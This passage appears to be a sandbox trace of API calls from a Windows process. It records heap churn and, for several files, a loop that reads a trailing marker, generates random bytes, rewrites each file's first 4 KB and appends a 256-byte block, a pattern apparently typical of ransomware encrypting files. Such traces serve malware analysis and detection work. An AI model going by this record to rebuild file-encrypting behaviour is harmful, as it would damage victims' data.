Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.819] GetProcessHeap () returned 0x280000 [0075.819] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.820] GetProcessHeap () returned 0x280000 [0075.820] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.821] GetProcessHeap () returned 0x280000 [0075.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.821] GetProcessHeap () returned 0x280000 [0075.821] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.821] GetProcessHeap () returned 0x280000 [0075.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.821] GetProcessHeap () returned 0x280000 [0075.821] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.821] GetProcessHeap () returned 0x280000 [0075.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.821] GetProcessHeap () returned 0x280000 [0075.821] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.821] GetProcessHeap () returned 0x280000 [0075.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.821] GetProcessHeap () returned 0x280000 [0075.821] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.821] GetProcessHeap () returned 0x280000 [0075.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.821] GetProcessHeap () returned 0x280000 [0075.821] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.821] GetProcessHeap () returned 0x280000 [0075.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.821] GetProcessHeap () returned 0x280000 [0075.821] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.821] GetProcessHeap () returned 0x280000 [0075.821] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.821] GetProcessHeap () returned 0x280000 [0075.821] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.822] GetProcessHeap () returned 0x280000 [0075.822] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.822] GetProcessHeap () returned 0x280000 [0075.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.822] GetProcessHeap () returned 0x280000 [0075.822] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.822] GetProcessHeap () returned 0x280000 [0075.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.822] GetProcessHeap () returned 0x280000 [0075.822] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.822] GetProcessHeap () returned 0x280000 [0075.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.822] GetProcessHeap () returned 0x280000 [0075.822] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.822] GetProcessHeap () returned 0x280000 [0075.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.822] GetProcessHeap () returned 0x280000 [0075.822] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0075.822] GetProcessHeap () returned 0x280000 [0075.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.822] GetProcessHeap () returned 0x280000 [0075.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0075.822] GetProcessHeap () returned 0x280000 [0075.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0075.822] GetProcessHeap () returned 0x280000 [0075.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0075.822] GetProcessHeap () returned 0x280000 [0075.822] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0075.822] SetFilePointerEx (in: hFile=0x7d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.823] WriteFile (in: hFile=0x7d0, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0075.823] WriteFile (in: hFile=0x7d0, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0075.823] GetProcessHeap () returned 0x280000 [0075.823] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0075.823] GetProcessHeap () returned 0x280000 [0075.823] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0075.823] GetProcessHeap () returned 0x280000 [0075.823] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0075.823] CloseHandle (hObject=0x7d0) returned 1 [0075.825] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 20 [0075.825] SetFilePointerEx (in: hFile=0x7d4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.825] ReadFile (in: hFile=0x7d4, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0075.825] SetFilePointerEx (in: hFile=0x7d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.825] GetProcessHeap () returned 0x280000 [0075.825] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0075.825] GetProcessHeap () returned 0x280000 [0075.825] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0075.825] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0075.825] GetProcessHeap () returned 0x280000 [0075.825] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0075.825] ReadFile (in: hFile=0x7d4, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0075.908] SetFilePointerEx (in: hFile=0x7d4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.908] WriteFile (in: hFile=0x7d4, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0075.908] GetProcessHeap () returned 0x280000 [0075.908] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0075.908] GetProcessHeap () returned 0x280000 [0075.908] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.908] GetProcessHeap () returned 0x280000 [0075.908] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0075.908] GetProcessHeap () returned 0x280000 [0075.908] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.908] GetProcessHeap () returned 0x280000 [0075.908] RtlReAllocateHeap (Heap=0x280000, Flags=0x0, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9d3b0 [0075.908] GetProcessHeap () returned 0x280000 [0075.908] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.908] GetProcessHeap () returned 0x280000 [0075.908] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.908] GetProcessHeap () returned 0x280000 [0075.908] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.908] GetProcessHeap () returned 0x280000 [0075.908] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.908] GetProcessHeap () returned 0x280000 [0075.908] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.908] GetProcessHeap () returned 0x280000 [0075.908] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.908] GetProcessHeap () returned 0x280000 [0075.908] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.908] GetProcessHeap () returned 0x280000 [0075.908] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.909] GetProcessHeap () returned 0x280000 [0075.909] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.923] GetProcessHeap () returned 0x280000 [0075.923] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.923] GetProcessHeap () returned 0x280000 [0075.923] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.923] GetProcessHeap () returned 0x280000 [0075.923] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.923] GetProcessHeap () returned 0x280000 [0075.923] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.923] GetProcessHeap () returned 0x280000 [0075.923] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cc8 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x8) returned 0x7d47cb8 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cc8 | out: hHeap=0x280000) returned 1 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x24) returned 0x7d941e0 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47cb8 | out: hHeap=0x280000) returned 1 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x40) returned 0x7d975e8 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d941e0 | out: hHeap=0x280000) returned 1 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e1a48 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d975e8 | out: hHeap=0x280000) returned 1 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d531d8 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e1a48 | out: hHeap=0x280000) returned 1 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d531d8 | out: hHeap=0x280000) returned 1 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.924] GetProcessHeap () returned 0x280000 [0075.924] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.924] GetProcessHeap () returned 0x280000 [0075.925] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.925] GetProcessHeap () returned 0x280000 [0075.925] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.925] GetProcessHeap () returned 0x280000 [0075.925] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.925] GetProcessHeap () returned 0x280000 [0075.925] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.925] GetProcessHeap () returned 0x280000 [0075.925] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.925] GetProcessHeap () returned 0x280000 [0075.925] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.925] GetProcessHeap () returned 0x280000 [0075.925] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.925] GetProcessHeap () returned 0x280000 [0075.925] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.925] GetProcessHeap () returned 0x280000 [0075.925] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.925] GetProcessHeap () returned 0x280000 [0075.925] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.925] GetProcessHeap () returned 0x280000 [0075.925] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.925] GetProcessHeap () returned 0x280000 [0075.925] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.926] GetProcessHeap () returned 0x280000 [0075.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.926] GetProcessHeap () returned 0x280000 [0075.926] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.926] GetProcessHeap () returned 0x280000 [0075.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.926] GetProcessHeap () returned 0x280000 [0075.926] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.926] GetProcessHeap () returned 0x280000 [0075.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.926] GetProcessHeap () returned 0x280000 [0075.926] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a5b8 [0075.926] GetProcessHeap () returned 0x280000 [0075.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.926] GetProcessHeap () returned 0x280000 [0075.926] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x200) returned 0x7d6a3b0 [0075.926] GetProcessHeap () returned 0x280000 [0075.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a5b8 | out: hHeap=0x280000) returned 1 [0075.926] GetProcessHeap () returned 0x280000 [0075.926] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x220) returned 0x7dc1440 [0075.926] GetProcessHeap () returned 0x280000 [0075.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d6a3b0 | out: hHeap=0x280000) returned 1 [0075.926] GetProcessHeap () returned 0x280000 [0075.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d47ca8 | out: hHeap=0x280000) returned 1 [0075.926] GetProcessHeap () returned 0x280000 [0075.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d3b0 | out: hHeap=0x280000) returned 1 [0075.926] GetProcessHeap () returned 0x280000 [0075.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7dc1440 | out: hHeap=0x280000) returned 1 [0075.926] GetProcessHeap () returned 0x280000 [0075.926] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9ccf8 | out: hHeap=0x280000) returned 1 [0075.926] SetFilePointerEx (in: hFile=0x7d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.927] WriteFile (in: hFile=0x7d4, lpBuffer=0x7d532e0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d532e0*, lpNumberOfBytesWritten=0x722fd44*=0x100, lpOverlapped=0x0) returned 1 [0075.927] WriteFile (in: hFile=0x7d4, lpBuffer=0x722fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x722fd48*, lpNumberOfBytesWritten=0x722fd44*=0x4, lpOverlapped=0x0) returned 1 [0075.927] GetProcessHeap () returned 0x280000 [0075.927] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8bf0058 | out: hHeap=0x280000) returned 1 [0075.927] GetProcessHeap () returned 0x280000 [0075.927] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d9d068 | out: hHeap=0x280000) returned 1 [0075.927] GetProcessHeap () returned 0x280000 [0075.927] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x7d532e0 | out: hHeap=0x280000) returned 1 [0075.927] CloseHandle (hObject=0x7d4) returned 1 [0075.928] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 21 [0075.928] SetFilePointerEx (in: hFile=0x7d8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.929] ReadFile (in: hFile=0x7d8, lpBuffer=0x722fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x722fd4c*, lpNumberOfBytesRead=0x722fd08*=0x0, lpOverlapped=0x0) returned 1 [0075.929] SetFilePointerEx (in: hFile=0x7d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.929] GetProcessHeap () returned 0x280000 [0075.929] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x100) returned 0x7d532e0 [0075.929] GetProcessHeap () returned 0x280000 [0075.929] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x20) returned 0x7d9d068 [0075.929] SystemFunction036 (in: RandomBuffer=0x7d9d068, RandomBufferLength=0x20 | out: RandomBuffer=0x7d9d068) returned 1 [0075.929] GetProcessHeap () returned 0x280000 [0075.929] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x1000) returned 0x8bf0058 [0075.929] ReadFile (in: hFile=0x7d8, lpBuffer=0x8bf0058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x722fd08, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesRead=0x722fd08*=0x1000, lpOverlapped=0x0) returned 1 [0075.982] SetFilePointerEx (in: hFile=0x7d8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.982] WriteFile (in: hFile=0x7d8, lpBuffer=0x8bf0058*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x722fd44, lpOverlapped=0x0 | out: lpBuffer=0x8bf0058*, lpNumberOfBytesWritten=0x722fd44*=0x1000, lpOverlapped=0x0) returned 1 [0075.982] GetProcessHeap () returned 0x280000 [0075.982] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47ca8 [0075.982] GetProcessHeap () returned 0x280000 [0075.982] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 0x7d47cb8 [0075.982] GetProcessHeap () returned 0x280000 [0075.982] RtlReAllocateHeap (Heap=0x280000, Flags=0x8, Ptr=0x7d47cb8, Size=0x20) returned 0x7d9ccf8 [0075.982] GetProcessHeap () returned 0x280000 [0075.982] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0x4) returned 